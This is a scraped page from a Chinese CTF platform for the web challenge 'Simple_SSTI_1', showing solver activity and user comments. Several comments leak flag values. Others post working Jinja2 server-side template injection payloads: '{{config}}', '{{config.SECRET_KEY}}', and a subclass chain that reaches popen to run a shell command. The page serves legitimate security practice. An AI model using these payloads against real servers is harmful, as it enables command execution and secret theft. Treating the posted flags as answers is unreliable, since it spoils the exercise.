Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
28942
提 示:
描 述:
Simple_SSTI_1
评分(51)
解题动态
孙笑川ᒿ58 攻破了该题 1天前
Spotlight 攻破了该题 1天前
liyimanfan 攻破了该题 1天前
bugku0521 攻破了该题 2天前
假若今夜来临 攻破了该题 2天前
qqai 攻破了该题 3天前
proapolly 攻破了该题 4天前
bug1000 攻破了该题 4天前
leelee0615 攻破了该题 6天前
ZsZmjXxz 攻破了该题 6天前
wlk 攻破了该题 6天前
Qispash 攻破了该题 6天前
雲边有棵面包树 攻破了该题 6天前
rudy1899 攻破了该题 7天前
xiaofangni 攻破了该题 8天前
sxyscm 攻破了该题 9天前
lisailin 攻破了该题 9天前
kxzzy 攻破了该题 10天前
juicebug 攻破了该题 10天前
评论
18483555203 2年前
举报
flag{16346b3ff029db0cedd2d4d2df81df5a}
2027347950 2年前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
iii1 2年前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
DragonWE 2年前
举报
flag{9c260fb48e0a0db7708b6f3ebe9ff732}
iain4048 2年前
举报
查看源代码提示找secret key value
13663536751 2年前
举报
flag{e0ad0234936fcd15f11c7bb0f9d587e7}
2346254613 2年前
举报
这个是答案吗
啊这这 2年前
举报
使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)
avengert 2年前
举报
你们这么泄题,一会儿不得刷一轮儿了啊。
xbhgg 2年前
举报
大神们怎么知道的参数里面放的是config。。。
justsosoloveyou 2年前
举报
POC: /?flag={{config}} 或 /?flag={{config.SECRET_KEY}} 原理:SSTI 就是服务器端模板注入(Server-Side Template Injection),可以获取前端传入参数的值进行处理,类似于 {{}} 的变量经过引擎解析的时候,进行了执行,然后渲染并填充到web页面。 思路:页面提示flag参数,源码注释提示secret_key参